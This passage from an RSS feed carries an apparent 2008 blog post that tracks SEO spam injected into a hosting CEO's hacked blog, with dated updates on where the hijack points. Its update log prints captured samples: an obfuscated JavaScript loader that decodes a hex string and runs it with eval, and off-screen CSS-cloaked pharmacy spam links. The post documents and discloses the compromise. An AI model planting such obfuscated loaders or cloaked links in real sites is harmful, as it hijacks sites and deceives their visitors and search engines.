<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/mattheatoncom-jan-08.png' title='screenshot of mattheaton.com on january 2008' type="image/png" class="icn-">mattheaton.com Jan 28 2008</a> <small>(1009 x 6576 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/levitra-tagging-googlebot.png' title='brainwave-india hacked by goro' type="image/png" class="icn-">brainwave-india.com Jan 28 2008</a> <small>(1016 x 2306 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/localsearch.png' title='Spamdexing Google Localsearch' type="image/png" class="icn-">Google Local Search Jan 28 2008</a> Spamdexing Results</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra.png' title='stc-israel.org.il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (hidden text)</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra-white.png' title='stc-israel.org il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (text reveal)</li>
</ul>
<h2 class="cb mgt mgb">Recent Update</h2>
<ul class="xoxo r">
<li><span class="fw">Feb 1, 2008</span> - we send a letter to <span class="vcard"><a href="mailto:matt@bluehost.com" class="url fn email microformat icn-l">matt@bluehost.com</a></span> regarding this issue. Still waiting for his replies</li>
<li><span class="fw">Feb 3, 2008</span> - The Blackhat Goro Spammer change their target spamhost from <a href="http://www.brainwave-india.com" class="exturl icn-r">http://www.brainwave-india.com</a> <small>(PR6)</small> to <a href="http://www.thinkingphp.org" class="exturl icn-r">http://www.thinkingphp.org</a> <small>(PR6)</small> - <span class="vcard"><a href="http://www.fg-webdesign.de/en/" class="url fn microformat icn-l">Felix Geisend&#246;rfer</a></span>.
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt;&lt;a href=&quot;http://www.thinkingphp.org/?read=796 ... prescription&lt;/a&gt;&lt;/div&gt;&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;</pre>
<p><strong>thinkingphp.org</strong> blog is running on <em>WordPress 2.3.2</em>. We send him email regarding the <strong class="fw-">Goro Spam hijack</strong>.
</li>
<li id="feb8"><span class="fw">Feb 8th 2008</span>, There is no signature of Goro spam (tag with id goro) on Matt&#8217;s blog the blackhat is now using <em>Inline CSS Position Overflow </em> to hide the spams links &darr; redirect to <a href="http://www.zoorender.com" class="exturl icn-r1">zoorender.com</a> <small>(PR6)</small>.
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.zoorender.com/?discount=1776&quot;&gt;buying .. &lt;/div&gt;
</pre>
</li>
<li id="feb13"><span class="fw">Feb 13th 2008</span>, Same methods as above (inline css cloacking) .
<ul>
<li>HTML Code shown to a Regular Browser &rarr; 32,246 characters</li>
<li>HTML Code shown to Google Bot &rarr; 34,646 characters</li>
</ul>
<p>redirect to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a> <small>(PR7)</small>.</p>
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://blog.jensfranke.com/?read=606&quot;&gt;buy generic fi
</pre>
</li>
<li id="feb20"><span class="fw">Feb 20th 2008</span>, CSS Cloacking redirect to <a href="http://http://www.entrepreneur27.org/" class="exturl icn-r1">http://www.entrepreneur27.org/</a> <small>(PR6)</small>.
<pre class="smallbox">
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1591&quot;&gt;bad side effects of viagra&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1592&quot;&gt; ...
&lt;/div&gt;
</pre>
<li id="feb-24-08"><span class="fw">Feb 24th 2008</span>, CSS Cloacking redirect to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="latenightpc.com">http://www.latenightpc.com</a> <small>(PR5)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>mattheaton-com-022408-source.txt</a></small></li>
<li id="feb-26-08"><span class="fw">Feb 26th 2008</span>, CSS Cloacking redirect to <a href="http://www.communitynext.com/" class="exturl icn-r1" title="www.communitynext.com">http://www.communitynext.com/</a> WordPress 2.3.3 <small>(PR6)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>mattheaton-com-022608-source.txt</a></small>
</li>
</ul>
<h2 class="mgt mgb-">Related Posts</h2>
<ul class="xoxo pdt exturl">
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed wordpress.net.in Spam Injection"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a></li>
</ul>
<h2 class="cb mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/d3d3Lm1hdHRoZWF0b24uY29t.curie,80,302" title="Bluehost and Hostmonster CEO Blog">Bluehost &#038; Hostmonster CEO&#8217;s Blog</a></li>
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://en.wikipedia.org/wiki/Spamdexing">Wikipedia &#8594; Spamdexing</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
